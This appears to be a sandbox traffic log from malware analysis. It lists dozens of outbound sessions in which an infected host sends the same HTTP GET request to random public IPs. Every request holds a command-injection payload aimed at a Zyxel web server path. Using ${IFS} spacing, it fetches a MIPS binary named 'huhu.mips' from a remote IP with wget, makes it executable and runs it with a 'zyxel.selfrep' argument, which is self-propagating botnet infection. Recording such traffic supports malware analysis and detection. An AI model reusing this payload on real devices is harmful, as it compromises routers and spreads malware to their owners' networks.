                                                  Jan 19, 2024 18:23:51.982228994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3540192.168.2.136039064.126.29.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982258081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3541192.168.2.134836294.238.86.202443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982300997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3542192.168.2.1338686198.90.166.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982338905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3543192.168.2.1346212175.53.3.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982378960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3544192.168.2.135594270.57.11.242443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982414007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3545192.168.2.135752083.163.0.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982460022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3546192.168.2.134504039.14.244.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982479095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3547192.168.2.1356324164.108.148.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982525110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3548192.168.2.1342606197.76.230.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982573986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3549192.168.2.1353802145.68.40.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982599974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3550192.168.2.136005669.17.219.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982649088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3551192.168.2.134541660.177.253.132443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982698917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3552192.168.2.1343804209.87.197.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982726097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3553192.168.2.1343408217.171.81.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982777119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3554192.168.2.134079625.67.236.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982846975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3555192.168.2.1341784197.215.108.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982902050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3556192.168.2.1357900200.59.168.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982954025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3557192.168.2.1348934168.117.129.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983000994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3558192.168.2.135497650.138.142.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983037949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3559192.168.2.1360368111.69.37.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983058929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3560192.168.2.136042288.129.128.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983129978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3561192.168.2.1355146213.99.242.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983175039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3562192.168.2.1348066221.242.53.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983207941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3563192.168.2.1333272126.129.29.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983244896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3564192.168.2.135250293.53.247.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983298063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3565192.168.2.1354672159.40.65.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983340025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3566192.168.2.1360486131.95.0.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983380079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3567192.168.2.1349734103.233.195.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983416080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3568192.168.2.135249473.57.153.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983458996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3569192.168.2.135470047.9.78.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983498096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3570192.168.2.133418892.191.245.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983510971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3571192.168.2.133667424.48.27.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983562946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3572192.168.2.135854042.110.61.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983599901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3573192.168.2.136021065.50.221.87443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983648062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3574192.168.2.133706666.246.218.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983686924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3575192.168.2.1353412188.246.179.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983714104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3576192.168.2.133936679.236.12.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983758926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3577192.168.2.1335766200.68.52.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983793020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3578192.168.2.1341874176.216.251.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983848095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3579192.168.2.1354620151.184.81.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983886957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3580192.168.2.1360026154.125.251.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983916998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3581192.168.2.134563232.81.205.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983949900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3582192.168.2.135422817.200.116.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.983985901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3583192.168.2.1352770204.164.125.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984045982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3584192.168.2.134419890.62.209.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984085083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3585192.168.2.134306242.154.92.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984105110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3586192.168.2.134164051.217.150.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984128952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3587192.168.2.1341706185.33.118.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984189034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3588192.168.2.135841480.149.98.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984237909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3589192.168.2.1356282173.58.69.102443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984271049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3590192.168.2.1353858216.0.182.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984296083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3591192.168.2.135909863.94.169.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984354973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3592192.168.2.1346038220.241.107.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984385967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3593192.168.2.1343914126.114.128.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984427929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3594192.168.2.1357786138.54.113.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984477043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3595192.168.2.1355434192.23.138.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984505892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3596192.168.2.1342900173.108.166.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984543085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3597192.168.2.1357336210.54.205.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984597921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3598192.168.2.1342834119.105.77.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984639883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3599192.168.2.1334394140.222.235.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984663010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3600192.168.2.1351098148.83.49.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984710932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3601192.168.2.1350134125.64.39.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.984746933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3602192.168.2.1334058124.116.57.8443
                                                  TimestampBytes transferredDirectionData
